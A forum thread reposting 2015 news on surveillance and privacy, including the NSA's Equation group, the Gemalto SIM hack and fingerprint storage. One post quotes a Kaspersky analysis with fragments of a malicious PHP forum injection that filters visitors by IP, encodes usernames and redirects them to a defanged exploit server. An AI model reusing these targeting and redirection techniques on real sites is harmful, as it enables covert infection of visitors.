they know what you are doing

[zorgon]

[space otter]

Apple Wants To Beam Your Fingerprint To New Devices

The Huffington Post    |  By  Damon Beres   
Posted:  01/15/2015 4:14 pm EST    Updated:  18 minutes ago



pic
A new patent suggests Apple might put your fingerprint data in the cloud. | US Patent And Trademark Office




Apple may be envisioning a world where buying a latte is as easy as holding up your index finger.

A patent application published online Thursday by the United States Patent and Trademark Office would allow the iPhone maker to share your fingerprint data between devices via the cloud.

Apple already uses fingerprint technology in Touch ID, which allows individuals to unlock their phones and iPads with a fingerprint. The process is supposedly more secure and convenient than typing in a password.

The new patent, which Apple has not officially been granted, extends this idea to cover uploading and storing fingerprint data. The patent describes downloading fingerprint data to a second device after it's been collected. That second device would have a biometric sensor of its own, which it would use to match the fingerprint data you've already offered.

It's an appealing idea because, in theory, your fingerprint could be associated with a profile including relevant information and settings. Perhaps you could easily set up a new iPhone to make it feel like your old device with the touch of your fingerprint. The patent also suggests that vendors equipped with touch devices could charge you for products -- like coffee -- using your fingerprint.

Apple Pay already lets you buy things using your fingerprint on your own device, but the new patent opens the door to making purchases without pulling anything out of your pocket. It's possible you could just touch a vendor's iPad or iPhone instead.

The patent seems to represent something of a reversal from Apple's current status quo with Touch ID. When the fingerprint scanner made its debut in 2013, the company explicitly stated that an individual's fingerprint data is "never stored on Apple servers, and it's never backed up to iCloud or anywhere else." The new patent, which covers a cloud computing device capable of "uploading and storing the enrollment finger biometric data," would seem to be a different approach.

A representative for Apple told The Huffington Post via email that the company does not comment on patents. Some experts and politicians have expressed concern over the idea of storing fingerprint data.

When Touch ID was first announced, Sen. Al Franken (D-Minn.) said he was worried about security, noting that compromised fingerprints could spell disaster for individuals -- you can get a new credit card, but you can't exactly replace your fingerprints.

"There is an additional security concern. Someone could steal your credentials. If hackers steal credit card numbers, they can steal fingerprints," Bruce Schneier, a security technologist, told HuffPost via phone.
However, Schneier noted an important point: Apple doesn't store an image of your actual fingerprint. Instead, the company uses a "mathematical representation" of your fingerprint. In other words, hackers wouldn't be able to lift a picture of your fingerprint, but they could perhaps take the data that represents it.

Still, Apple has said not to worry.

"It isn't possible for someone to reverse engineer your actual fingerprint image from this mathematical representation," Apple says.

Hackers aside, fingerprint data can spell trouble in another way: You can't conveniently "forget" it. A judge recently ruled ruled that cops can force you to unlock your phone using your fingerprints, even though they can't ask for your password.



http://www.huffingtonpost.com/2015/01/15/apple-fingerprint_n_6480088.html

[Ellirium113]

Shocking: CIA clears CIA in Senate hacking brouhaha

The five officers involved in the CIA monitoring of computers Senate staffers used while probing the intelligence agency's torture program acted in good faith and committed no wrongdoing. That's according to a Wednesday report from an "accountability board" in which three of its five members are CIA officials.

The review board concluded there was simply a misunderstanding, that the CIA believed it could search the computers being used by staffers of the Senate Select Committee on Intelligence. National security was at stake, too.

"The Board determined that while an informal understanding existed that SSCI work product should be protected, no common understanding existed about the roles and responsibilities in the case of a suspected security incident," according to its highly redacted report [PDF] released Wednesday. The review said that the CIA's position was that it had "obligations under the National Security Act" and a legal duty to scour the computers "for the presence of Agency documents to which SSCI staff should not have access."

Sen. Dianne Feinstein (D-CA) chaired the intelligence committee last year when the breaches occurred, and the politician said she was "disappointed that no one at the CIA will be held accountable."

Feinstein said the decision "was made to search committee computers, and someone should be found responsible for those actions."

http://arstechnica.com/tech-policy/2015/01/shocking-cia-clears-cia-in-senate-hacking-brouhaha/

It's ok...if they WERE found guilty they would also be prosecuted by the CIA.   

[zorgon]

Family history is in our DNA. What's in yours?

Ancestry.com wants yoou to send them a DNA sample so to better compare you with your ancestors when searching... and it will only cost you $99.00



Get personalized details about your ethnic origins. Discover more about your story with advanced DNA science from the experts in family history.
Now $99

SOURCE

Okay so wait a second... They have DNA records of your ancestors on file?

Is ANYONE actually falling for this?

[space otter]

yes..well I've been doing some personal genealogy and have found that ancestory dot com has the market pretty much controled.. and all for various price ranges
so I have been going around them as much as possible and have found quite a bit of info
that I was totally surprised by..man more relatives than I thought possible

anywho that is all besides the point of just who is ancestry  dot com
with a little digging it sounds a lot like someone else I just profiled

trust is just a hard thing anymore..ain't it.....sigh

oh yeah and after every day's searching I run a scan and ususally remove tons of tracking cookies
pisses me off totally..grrrrrrrr







addition to Permira, the buyout group includes the private equity firm's co-investors, members of Ancestry.com's management, including Chief Executive Tim Sullivan and Chief Financial Officer Howard Hochhauser, and Spectrum Equity, which owns about 30 percent of Ancestry.com, the Journal said.Oct 22, 2012






Ancestry.com Reportedly Agrees To $1.6 Billion Buyout
www.huffingtonpost.com/.../ancestry-deal_n_1999007...
The Huffington Post

Ancestry.com Reportedly Agrees To $1.6 Billion Buyout
Reuters
Posted: 10/22/2012 2:03 am EDT Updated: 10/21/2013 4:59 am EDT





(Reuters) - An investor group led by private equity firm Permira Advisers LLP has agreed to buy genealogy website Ancestry.com Inc for about $1.6 billion, or $32 a share, the Wall Street Journal reported, citing people familiar with the deal.

In addition to Permira, the buyout group includes the private equity firm's co-investors, members of Ancestry.com'sagement, including Chief Executive Tim Sullivan and Chief Financial Officer Howard Hochhauser, and Spectrum Equity, which owns about 30 percent of Ancestry.com, the Journal said.

Provo, Utah-based Ancestry, whose website helps users trace their family roots by scouring online records, and Permira Advisers, could not immediately be reached for comment outside regular U.S. business hours.

Shares of Ancestry.com closed at $29.18 Friday on the Nasdaq.


Ancestry received offers from the three private equity firms in August and none of the bidders met the company's price expectations at the time, sources familiar with the matter previously told Reuters.

(Reporting by Sakthi Prasad; additional reporting by Vrinda Manocha in Bangalore; Editing by Louise Heavens)
.......


History[edit]

Founded in 1993 by Brion Applegate and William Collatos, Spectrum Equity raised its first fund in May 1994. Applegate had been a general partner of funds managed by Burr, Egan, Deleage, & Co.[3] Collatos began his private equity career at TA Associates where he was a general partner before leaving to become a founding general partner of its spin-off, Media Communications Partners.[4] Spectrum Equity has raised seven private equity funds since its founding, totaling $5.7[1] billion of capital.
From Wikipedia, the free encyclopedia

Jump to: navigation, search


Spectrum Equity

Spectrum Equity


Type
Private

Industry
Private Equity, Growth Equity

Founded
1994

Headquarters
Boston, Massachusetts, U.S San Francisco, California, U.S

Products
Growth capital, Recapitalizations

Total assets
$5.7 billion

Website
www.spectrumequity.com

Spectrum Equity is a growth equity firm, investing in businesses focused on the information economy. The firm's partners have worked together for an average of 15 years,[1] leading a team operating out of offices in Boston, MA and San Francisco, CA. The firm's sectors of focus include: Software & Information Services; Internet & Digital Media; and Communications, Media & Entertainment. Spectrum Equity seeks out companies which have defensible and sustainable business models with strong recurring revenue, significant operating leverage, strong cash flow margins, and franchise customer loyalty.[2] Typical equity investments range from $25 – $100 million,[1] and the firm is comfortable as either a minority or majority owner in companies. Spectrum Equity has invested in companies that are category leaders across North America, Western Europe, and Australia.

In addition to providing equity capital for growth and liquidity, Spectrum Equity plays a prominent role in helping its portfolio companies in the implementation of their business plans. As members of the board of directors for each of their portfolio companies, the Spectrum Equity team helps with strategic decisions, capital market transactions, recruitment of talent, the identification of acquisitions, and product initiatives.


....................



Permira | Investing in growth | Private Equity with Global ...
www.permira.com/ Cached
Similar

Permira
Loading...
Founded in 1985, Permira is a European private equity firm with global reach. The firm advises funds with a committed capital of approximately €20 billion.
?People - ?Investments - ?Offices - ?Hong Kong

Permira is a European private equity firm, founded in 1985. The firm advises funds with a total committed capital of approximately €20 billion. Since 1985 the Permira funds, raised from pension funds and other institutions, have made nearly 200 private equity investments.

Permira specialises in five sectors: Consumer, Financial Services, Healthcare, Industrials and TMT (Technology, Media, Telecommunications). There are currently 25 companies in the Permira funds' portfolio and the firm comprises approximately 120 professionals.

The firm's teams are based in Frankfurt, Guernsey, Hong Kong, London, Luxembourg, Madrid, Menlo Park, Milan, New York, Paris, Stockholm and Tokyo. Permira is led by two co-managing partners Kurt Björklund and Tom Lister.

The Social Business Trust[edit]
Permira is a founding partner of Social Business Trust (SBT), a social enterprise fund. Since launching in December 2010, SBT has made five investments - Women Like Us, The Challenge Network, Moneyline, the London Early Years Foundation and the Inspiring Futures Foundation. SBT is a partnership of six leading global companies (Bain & Co, Clifford Chance, Credit Suisse, Ernst & Young, Permira and Thomson-Reuters) dedicated to transforming social enterprises by providing £10m of growth capital and skilled support


well yes of course I will send you my dna..  NOT





            


seems a lot of money is being spent on herding the sheeple....wonder why 




damn I can't seem to stop looking stuff up...I think I need a nap and maybe this bug will go away

there's more.. there is always more



http://kcpw.org/blog/the-bottom-line/2014-07-08/tim-sullivan-ancestry-com-president-ceo/

The Bottom Line: Ancestry.com President & CEO, Tim Sullivan

Ross 07/8/2014 7 Comments


TimSullivanThe Bottom Line (Air Date: July 8, 2014) – Utah-based Ancestry.com is the world's largest online family history resource. Under Tim Sullivan's leadership, Ancestry.com has grown to over 2.7 million paying subscribers, and generates more than a half a billion dollars a year in revenue.  It was recently sold to a private equity firm for $1.6 billion.  Sullivan talks about Ancestry.com's DNA service that helps people learn their ethnic makeup and connects them to their deep genealogical past.  He also explains how Ancestry.com has tried to make family history research easier while not alienating serious genealogy researchers.  Sullivan shares his journey from the University of North Carolina with a Morehead Scholarship and his early interest in documentary film-making.  He later worked for Disney's home video division, then for Disney in Hong Kong, and later transitioned to Ticketmaster-City Search. Sullivan talks about Ancestry.com's 2013 $60 million partnership with the LDS Church to bring over one billion historical documents online.



Podcast: Play in new window | Download (26.2MB)    podcast at link





http://www.glassdoor.com/Overview/Working-at-Ancestry-com-EI_IE243532.11,23.htm




.......... I think it's January cabin fever.....yikes











but to prove that I really am an optimist.. I'm off to go thur the pile of seed catalogs
with that song as an ear worm today

[space otter]

http://www.huffingtonpost.com/2015/01/27/snowden-regin-spy_n_6559520.html




New Snowden Findings Suggest Cyber-Espionage Program Used By Several Countries



Reuters 
  Posted:  01/27/2015 9:29 pm EST    Updated:  1 hour ago

SAN FRANCISCO, Jan 27 (Reuters) - A program used by U.S. and British spies to record computer keystrokes was part of sophisticated hacking operations in more than a dozen countries, security experts said on Tuesday, after former NSA contractor Edward Snowden reportedly leaked the source code for the program.

On Tuesday, researchers at security software firm Kaspersky Lab said that much of that code, published this month by German magazine Spiegel, matched what they previously found in machines infected by Regin, a major suite of spying tools exposed in November.

Lead Kaspersky researcher Costin Raiu said that the keylogging program, called Qwerty, would work only with Regin, and that it appeared several Western countries' spies had been using Regin over the course of a decade.
Multiple attacker groups are using the Regin platform, which is a new conclusion for us," Raiu told Reuters.

Spiegel and other publications reported earlier that Regin had been used in the hacking of Belgian telecommunications provider Belgacom, which slides provided by Snowden said was targeted to enable spying on mobile phones in Europe.

Overall, the malicious software has been discovered at more than two dozen sites in 14 countries, including Russia, India, Germany and Brazil. Targets included government agencies, financial institutions and multilateral bodies.

The NSA did not respond to a request for comment. After past Snowden disclosures, it has avoided discussing specific operations but said it complies with U.S. law, which allows broad surveillance overseas.

The new findings suggest that Regin was a platform for spying operations that was shared among the so-called Five Eyes—the United States, United Kingdom, Canada Australia, and New Zealand.

In its own November report on Regin, top U.S. antivirus company Symantec Corp said it was extraordinarily well disguised, and that even when traces were found it was difficult to know the purpose. Like some other top-tier spying programs, Regin has different modules that can be installed to achieve different ends.

Symantec said it found victims in the telecom industry as well as energy, airline and research concerns.

(Reporting by Joseph Menn; Editing by Christian Plumb)

[space otter]

NSA Has Ability To Hide Spying Software Deep Within Hard Drives: Cyber Researchers



Reuters    |  By Joseph Menn 
  Posted:  02/16/2015 7:39 pm EST    Updated:  15 minutes ago

By Joseph Menn

SAN FRANCISCO, Feb 16 (Reuters) - The U.S. National Security Agency has figured out how to hide spying software deep within hard drives made by Western Digital, Seagate, Toshiba and other top manufacturers, giving the agency the means to eavesdrop on the majority of the world's computers, according to cyber researchers and former operatives.

That long-sought and closely guarded ability was part of a cluster of spying programs discovered by Kaspersky Lab, the Moscow-based security software maker that has exposed a series of Western cyberespionage operations.

Kaspersky said it found personal computers in 30 countries infected with one or more of the spying programs, with the most infections seen in Iran, followed by Russia, Pakistan, Afghanistan, China, Mali, Syria, Yemen and Algeria. The targets included government and military institutions, telecommunication companies, banks, energy companies, nuclear researchers, media, and Islamic activists, Kaspersky said. (http://reut.rs/1L5knm0)

The firm declined to publicly name the country behind the spying campaign, but said it was closely linked to Stuxnet, the NSA-led cyberweapon that was used to attack Iran's uranium enrichment facility. The NSA is the U.S. agency responsible for gathering electronic intelligence.

A former NSA employee told Reuters that Kaspersky's analysis was correct, and that people still in the spy agency valued these espionage programs as highly as Stuxnet. Another former intelligence operative confirmed that the NSA had developed the prized technique of concealing spyware in hard drives, but said he did not know which spy efforts relied on it.

NSA spokeswoman Vanee Vines said the agency was aware of the Kaspersky report but would not comment on it publicly.

Kaspersky on Monday published the technical details of its research on Monday, a move that could help infected institutions detect the spying programs, some of which trace back as far as 2001. (http://bit.ly/17bPUUe)

The disclosure could hurt the NSA's surveillance abilities, already damaged by massive leaks by former contractor Edward Snowden. Snowden's revelations have upset some U.S. allies and slowed the sales of U.S. technology products abroad.

The exposure of these new spying tools could lead to greater backlash against Western technology, particularly in countries such as China, which is already drafting regulations that would require most bank technology suppliers to proffer copies of their software code for inspection.

Peter Swire, one of five members of U.S. President Barack Obama's Review Group on Intelligence and Communications Technology, said the Kaspersky report showed that it is essential for the country to consider the possible impact on trade and diplomatic relations before deciding to use its knowledge of software flaws for intelligence gathering.

"There can be serious negative effects on other U.S. interests," Swire said.



TECHNOLOGICAL BREAKTHROUGH


According to Kaspersky, the spies made a technological breakthrough by figuring out how to lodge malicious software in the obscure code called firmware that launches every time a computer is turned on.

Disk drive firmware is viewed by spies and cybersecurity experts as the second-most valuable real estate on a PC for a hacker, second only to the BIOS code invoked automatically as a computer boots up.

"The hardware will be able to infect the computer over and over," lead Kaspersky researcher Costin Raiu said in an interview.

Though the leaders of the still-active espionage campaign could have taken control of thousands of PCs, giving them the ability to steal files or eavesdrop on anything they wanted, the spies were selective and only established full remote control over machines belonging to the most desirable foreign targets, according to Raiu. He said Kaspersky found only a few especially high-value computers with the hard-drive infections.

Kaspersky's reconstructions of the spying programs show that they could work in disk drives sold by more than a dozen companies, comprising essentially the entire market. They include Western Digital Corp, Seagate Technology Plc , Toshiba Corp, IBM, Micron Technology Inc and Samsung Electronics Co Ltd.

Western Digital, Seagate and Micron said they had no knowledge of these spying programs. Toshiba and Samsung declined to comment. IBM did not respond to requests for comment.


GETTING THE SOURCE CODE


Raiu said the authors of the spying programs must have had access to the proprietary source code that directs the actions of the hard drives. That code can serve as a roadmap to vulnerabilities, allowing those who study it to launch attacks much more easily.

"There is zero chance that someone could rewrite the [hard drive] operating system using public information," Raiu said.

Concerns about access to source code flared after a series of high-profile cyberattacks on Google Inc and other U.S. companies in 2009 that were blamed on China. Investigators have said they found evidence that the hackers gained access to source code from several big U.S. tech and defense companies.

It is not clear how the NSA may have obtained the hard drives' source code. Western Digital spokesman Steve Shattuck said the company "has not provided its source code to government agencies." The other hard drive makers would not say if they had shared their source code with the NSA.

Seagate spokesman Clive Over said it has "secure measures to prevent tampering or reverse engineering of its firmware and other technologies." Micron spokesman Daniel Francisco said the company took the security of its products seriously and "we are not aware of any instances of foreign code."

According to former intelligence operatives, the NSA has multiple ways of obtaining source code from tech companies, including asking directly and posing as a software developer. If a company wants to sell products to the Pentagon or another sensitive U.S. agency, the government can request a security audit to make sure the source code is safe.

"They don't admit it, but they do say, 'We're going to do an evaluation, we need the source code,'" said Vincent Liu, a partner at security consulting firm Bishop Fox and former NSA analyst. "It's usually the NSA doing the evaluation, and it's a pretty small leap to say they're going to keep that source code."

The NSA declined to comment on any allegations in the Kaspersky report. Vines said the agency complies with the law and White House directives to protect the United States and its allies "from a wide array of serious threats."

Kaspersky called the authors of the spying program "the Equation group," named after their embrace of complex encryption formulas.

The group used a variety of means to spread other spying programs, such as by compromising jihadist websites, infecting USB sticks and CDs, and developing a self-spreading computer worm called Fanny, Kaspersky said.

Fanny was like Stuxnet in that it exploited two of the same undisclosed software flaws, known as "zero days," which strongly suggested collaboration by the authors, Raiu said. He added that it was "quite possible" that the Equation group used Fanny to scout out targets for Stuxnet in Iran and spread the virus.



(Reporting by Joseph Menn; Editing by Tiffany Wu)

http://www.huffingtonpost.com/2015/02/16/nsa-computer-spying_n_6694736.html

[ArMaP]

Some snippets from the Kaspersky PDF at http://bit.ly/17bPUUe that I find interesting, with the most interesting (for me) parts marked in yellow:

The main purpose of Fanny appears to have been the mapping of air-gapped networks. For this, it used a unique USB-based command and control mechanism. When a USB stick is infected, Fanny creates a hidden storage area on the stick. If it infects a computer without an internet connection, it will collect basic system information and save it onto the hidden area of the stick. Later, when a stick containing hidden information is plugged into an internet-connected computer infected by Fanny, the data will be scooped up from the hidden area and sent to the C&C. If the attackers want to run commands on the air-gapped networks, they can save these commands in the hidden area of the USB stick. When the stick is plugged into the air-gapped computer, Fanny will recognize the commands and execute them. This effectively allowed the Equation group to run commands inside air-gapped networks through the use of infected USB sticks, and also map the infrastructure of such networks.

The Equation group relies on multiple techniques to infect their victims. These include:
•     Self-replicating (worm) code – Fanny
•     Physical media, CD-ROMs
•     USB sticks + exploits
•     Web-based exploits
The attacks that use physical media (CD-ROMs) are particularly interesting because they indicate the use of a technique known as "interdiction", where the attackers intercept shipped goods and replace them with Trojanized versions.

One such incident involved targeting participants at a scientific conference in Houston. Upon returning home, some of the participants received by mail a copy of the conference proceedings, together with a slideshow including various conference materials. The [compromised ?] CD-ROM used "autorun.inf" to execute an installer that began by attempting to escalate privileges using two known EQUATION group exploits. Next, it attempted to run the group's DOUBLEFANTASY implant and install it onto the victim's machine. The exact method by which these CDs were interdicted is unknown. We do not believe the conference organizers did this on purpose. At the same time, the super-rare DOUBLEFANTASY malware, together with its installer with two zero-day exploits, don't end up on a CD by accident.

Another example is a Trojanized Oracle installation CD that contains an EQUATIONLASER Trojan dropper alongside the Oracle installer.

With threat actor groups as skilled as the Equation team, mistakes are rare. Nevertheless, they do happen. Some of the keywords forgotten in the modules that we analyzed include:
•     SKYHOOKCHOW
•     prkMtx – unique mutex used by the Equation group's exploitation library ("PrivLib")
•     "SF" – as in "SFInstall", "SFConfig"
•     "UR", "URInstall" – "Performing UR-specific post-install..."
•     "implant" – from "Timeout waiting for the "canInstallNow" event from the implant-specific EXE!"
•     STEALTHFIGHTER – (VTT/82055898/STEALTHFIGHTER/2008-10-16/14:59:06.229-04:00)
•     DRINKPARSLEY –  (Manual/DRINKPARSLEY/2008-09-30/10:06:46.468-04:00)
•     STRAITACID –  (VTT/82053737/STRAITACID/2008-09-03/10:44:56.361-04:00)
•     LUTEUSOBSTOS –  (VTT/82051410/LUTEUSOBSTOS/2008-07-30/17:27:23.715-04:00)
•     STRAITSHOOTER STRAITSHOOTER30.exe
•     DESERTWINTER –  c:\desert~2\desert~3\objfre_w2K_x86\i386\DesertWinterDriver.pdb
•     GROK – standalonegrok_2.1.1.1
•     "RMGREE5" – c:\users\rmgree5\...

Note:  The codename GROK appears in several documents published by Der Spiegel, where "a keylogger" is mentioned. Our analysis indicates EQUATIONGROUP's GROK plugin is indeed a keylogger on steroids that can perform many other functions.

Victims generally fall into the following categories:
•     Governments and diplomatic institutions
•     Telecommunication
•     Aerospace
•     Energy
•     Nuclear research
•     Oil and gas
•     Military
•     Nanotechnology
•     Islamic activists and scholars
•     Mass media
•     Transportation
•     Financial institutions
•     Companies developing cryptographic technologies

All the malware we have collected so far is designed to work on Microsoft's Windows operating system. However, there are signs that non-Windows malware does exist. For instance, one of the sinkholed C&C domains is currently receiving connections from a large pool of victims in China that appear to be Mac OS X computers (based on the user-agent).

The malware callbacks are consistent with the DOUBLEFANTASY schema, which normally injects into the system browser (for instance, Internet Explorer on Windows).

The callbacks for the suspected Mac OS X versions have the following user agents:
•     Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17
•     Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
•     Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/536.28.10 (KHTML, like Gecko) Version/6.0.3 Safari/536.28.10

This leads us to believe that a Mac OS X version of DOUBLEFANTASY also exists.

Additionally, we observed that one of the malicious forum injections, in the form of a PHP script, takes special precautions to show a different type of HTML code to Apple iPhone visitors. Unlike other cases, such as visitors from Jordan, which does not get targeted, iPhone visitors are redirected to the exploit server, suggesting the ability to infect iPhones as well.

On March 2, 2013, a Kaspersky Lab user browsing an online forum was attacked with an exploit from one of the Equation group's exploitation servers:

2013-03-02 –  technicalconsumerreports[.]com/modular/assemble.php?params=YoGKKdExT[snip]cS5kS5t0bvGQyB8miDu+Agn – detected HEUR:Exploit.Script.Generic

The attack was unsuccessful as it was caught by our product and the user was protected. The attack was targeting Firefox 17 (TOR Browser), using an unknown exploit that we have not recovered.
Looking further, we identified a few other known Equation servers used in similar attacks even earlier:

2012-12-11 –  technology-revealed[.]com/diagram/navigate.html?overlay=AL[snip]OISn6sI1&sn=d1[SNIP]dd

These attacks were delivered in several ways – for example, while the user visited a number of Islamic Jihadist discussion forums, or via advertisements on popular websites in the Middle East.

The forums in question appear to have been compromised by a specific PHP script that exploited only authenticated visitors.

In practice, this means that only logged-in users will be exploited. Next, the PHP exploitation script checks if the user comes from a specific address range:
•     if(preg_match('/^(64.38.3.50|195.28.|94.102.|91.93.|41.130.|212.118.|79.173.|85.159.|94.249.|86.108.)/',IPADDRESS)){return "";}

Converting the ranges to their respective countries (except for 64.38.3.50, which is the only specific IP mentioned) we get the following TOP 3 countries that will NOT be exploited:
1.  Jordan
2.  Turkey
3.  Egypt
This means that the attackers have taken special care not to infect users visiting from certain ISPs in these countries. If the visitors are from any other IP range, the PHP script constructs an exploitation URL which includes the logged in vBulletin forum name:

$htt="http://technology-revealed[.]com/expand/order.php?design=ABRSRgDQlkUALAxGANDrRu
QQofe6Y0THS8E3hfBC+M+k7CdBmTH5gAkLvgV8EV3ULW+7KoUjbJ4UOFU6SVOtgEK7zTgPPNoDH
z4vKecDGe7OzDmJlvwKvc5uYg/I/5x9";

$htt=$htt."&sn=".bin2hex(substr($u,0,14));

The vBulletin forum username is stored in hex, as the "sn=" parameter to the exploit site. The exploit site can choose to hit the visitor with an exploit depending on the username, meaning that the attackers are taking great care to infect only very specific targets on these forums.

Interestingly, the PHP script produces a different HTML page for iPhone visitors:
•     if (preg_match('/iPhone/',$_SERVER['HTTP_USER_AGENT'])){$scroll='yes';}

This indicates that the exploit server is probably aware of iPhone visitors and can deliver exploits for them as well; otherwise, the exploitation URL can simply be removed for these visitors.

Most recently, the attackers used Java exploits, delivered through a specific server to visitors from the Middle East via advertising networks on popular websites.

[space otter]

NSA, British Spies Hacked SIM Card Maker, Had Access To Billions Of Phones: Report



Reuters    |  By Eric Auchard 
   Posted:  02/20/2015 10:56 am EST    Updated:  02/21/2015 8:59 am EST

* U.S., UK spies hacked SIM card maker Gemalto's system -Intercept

* News website cites documents from Edward Snowden

* Says gave spies ability to monitor calls on billions of phones

* Franco-Dutch firm Gemalto says it is investigating report (Adds information from European security source)

By Eric Auchard

FRANKFURT, Feb 20 (Reuters) - U.S. and British spies hacked into the world's biggest maker of phone SIM cards, allowing them to potentially monitor the calls, texts and emails of billions of mobile users around the world, an investigative news website reported.

The alleged hack on Gemalto, if confirmed, would expand the scope of known mass surveillance methods available to U.S. and British spy agencies to include not just email and web traffic, as previously revealed, but also mobile communications.

The Franco-Dutch company said on Friday it was investigating whether the U.S. National Security Agency (NSA) and Britain's GCHQ had hacked into its systems to steal encryption keys that could unlock the security settings on billions of mobile phones.

The report by The Intercept site, which cites documents provided by former NSA contractor Edward Snowden, could prove an embarrassment for the U.S. and British governments. It opens a fresh front in the dispute between civil liberties campaigners and intelligence services which say their citizens face a grave threat of attack from militant groups like Islamic State.

It comes just weeks after a British tribunal ruled that GCHQ had acted unlawfully in accessing data on millions of people in Britain that had been collected by the NSA.

The Intercept report (http://bit.ly/19E0KUK) said the hack was detailed in a secret 2010 GCHQ document and allowed the NSA and GCHQ to monitor a large portion of voice and data mobile communications around the world without permission from governments, telecom companies or users.

"We take this publication very seriously and will devote all resources necessary to fully investigate and understand the scope of such sophisticated techniques," said Gemalto, whose shares sunk by as much as 10 percent in early trading on Friday, following the report.

The report follows revelations from Snowden in 2013 of the NSA's Prism program which allowed the agency to access email and web data handled by the world's largest Internet companies, including Google, Yahoo and Facebook.

A spokeswoman for Britain's GCHQ (Government Communication Headquarters) said on Friday that it did not comment on intelligence matters. The NSA could not be immediately reached for comment.

A European security source said that mobile devices were widely used by terrorist groups and that intelligence agencies' attempts to access the communications were justified if they were "authorized, necessary and proportionate." The source did not confirm or deny that the documents were from GCHQ.

The source also said Western agencies would sometimes hold on to data over time in order to decrypt the communications of specific intelligence targets.

The source added that wireless networks in Iran, Afghanistan and Yemen were viewed as having significance intelligence value. These were identified by the Intercept as countries where Britain's GCHQ intercepted encryption keys used by local wireless network providers.


SURVEILLANCE

The new allegations could boost efforts by major technology firms such as Apple Inc and Google to make strong encryption methods standard in communications devices they sell, moves attacked by some politicians and security officials.

Leaders including U.S. President Barack Obama and British Prime Minister David Cameron have expressed concern that turning such encryption into a mass-market feature could prevent governments from tracking militants planning attacks.

Gemalto makes SIM (Subscriber Identity Module) cards for phones and tablets as well as "chip and pin" bank cards and biometric passports. It produces around 2 billion SIM cards a year and counts Verizon, AT&T Inc and Vodafone among hundreds of wireless network provider customers.

The European security source said that an assertion by The Intercept that GCHQ had taken control of Gemalto's internal network was speculative and not supported by documentation published by the website.

The Intercept, published by First Look Media, was founded by the journalists who first interviewed Snowden and made headlines around the world with reports on U.S. electronic surveillance programs.

It published what it said was a secret GCHQ document that said its staff implanted software to monitor Gemalto's entire network, giving them access to SIM card encryption keys. The report suggested this gave GCHQ, with the backing of the NSA, unlimited access to phone communications using Gemalto SIMs.

French bank Mirabaud said in a research report the attacks appeared to be limited to 2010 and 2011 and were aimed only at older 2G phones widely used in emerging markets, rather than modern smartphones. It did not name the source of these assertions.

Some analysts argued that if a highly security-conscious company like Gemalto is vulnerable, then all of its competitors are as well.

Gemalto competes with several European and Chinese SIM card suppliers. A spokesman for one major rival, Giesecke & Devrien of Germany, told Reuters: "We have no signs that something like that happened to us. We always do everything to protect our customers' data."

But while security experts have long believed spy agencies in many countries have the ability to crack the complex mathematical codes used to encrypt most modern communications, such methods remain costly, limiting their usefulness to targeted hijacking of individual communications.


(Additional reporting by Abhirup Roy and Supantha Mukherjee in Bengaluru; Leigh Thomas, Cyril Altmeyer, Blaise Robinson and Nicholas Vinocur in Paris, Mark Hosenball in Washington,; Jens Hack in Munich; and Harro ten Wolde in Frankfurt; Editing by Andrew Callus and Pravin Char)

[space otter]

http://www.latimes.com/nation/nationnow/la-na-nn-cia-cyber-espionage-20150305-story.html#page=1


CIA to create a digital spy division



March 6, 2015, 6:51 PM|Reporting from Langley, Va.




After more than a decade of hunting terrorists, stopping plots and scrambling from crisis to crisis, the CIA has concluded it has been outflanked and outwitted on a critical front: digital tradecraft..

On Friday, the CIA acknowledged that it was time to move into the 21st century, saying it was creating a special division to conduct cyberespionage.

Along with crunching data to help identify and approach new spies to recruit, the CIA hopes to improve its ability to trace the "digital dust" that potential targets leave during activities such as using an ATM card, renting a car or moving through a city with a cellphone.

Rival spy agencies use those digital fingerprints to help track CIA operatives, and the agency wants to find techniques to help officers working undercover hide their tracks online.
The digital world touches every aspect of our business," CIA Director John O. Brennan told reporters at CIA headquarters here. He acknowledged that the agency had been slow to adapt to the challenge.

The restructuring at the CIA comes after U.S. intelligence was caught off-guard by a series of high-profile digital attacks, including North Korea's destruction of computer systems at Sony Pictures and an Iranian-launched cyberassault on Las Vegas Sands Corp., the world's largest casino company, both last year.

James R. Clapper, the director of national intelligence, warned Congress last month that cyberattacks posed a greater long-term threat to national security than terrorism.

The Pentagon, FBI and Department of Homeland Security have stepped up cybersecurity operations, and the White House last month announced a new agency to help analyze and share digital threat information between government and business.

The new CIA division will be called the Directorate of Digital Innovation. It will have the same level of authority as the four long-standing directorates responsible for clandestine operations, analysis, spy gadgetry and logistical support.

"We must place our activities and operations in the digital domain at the very center of all our mission endeavors," Brennan told the CIA workforce on Friday.

The new focus threatens to put the CIA in direct competition with the mammoth National Security Agency, which specializes in breaking codes, vacuuming up conversations and communications, and analyzing huge troves of digital transmissions. The Pentagon's Cyber Command is responsible for launching digital warfare.

U.S. intelligence is both at the forefront, and a leading target, of hack attacks. The CIA long has barred people from bringing smartphones, portable hard drives and other digital devices into its headquarters to prevent people from copying or corrupting sensitive files.
Those fears were reinforced when Edward Snowden, a former CIA employee who went to work for the NSA as a contractor, copied vast troves of highly classified files about NSA surveillance systems and gave them to journalists. Snowden now lives in exile in Russia.

Officials said the CIA would focus less on collecting so-called signals intelligence and more on how to use digital tools to help protect American operatives and persuade adversaries to spill their secrets.

"We don't want to invest a lot of time, resources and energy" recruiting sources to steal secrets that are freely available online, Brennan told reporters.

As part of the reorganization, the agency also will create 10 regional and issue-focused "mission centers" that will attempt to break down the traditional walls between the directorates, especially the operators who steal secrets and recruit agents and the analysts who pore over data and brief policymakers and the president.

"There was, I think, great esprit de corps in those directorates, but also at times those directorates were a bit siloed, and were stovepiped," not sharing critical intelligence, Brennan said. Crucial data about threats still fall into "seams" between different divisions, he added.

The CIA was pilloried after the Sept. 11, 2001, terrorist attacks for failing to share information that might have allowed U.S. authorities to stop the Al Qaeda plot. The 9/11 Commission recommended numerous reforms after that intelligence failure, partly aimed at ending the lack of communication, but Brennan's comments suggest the problem persists.

Michael Allen, a former staff member for the House Intelligence Committee, said Brennan wanted to clone the aggressive focus that the CIA's counter-terrorism center used to track and kill scores of Al Qaeda operatives and ultimately Osama bin Laden

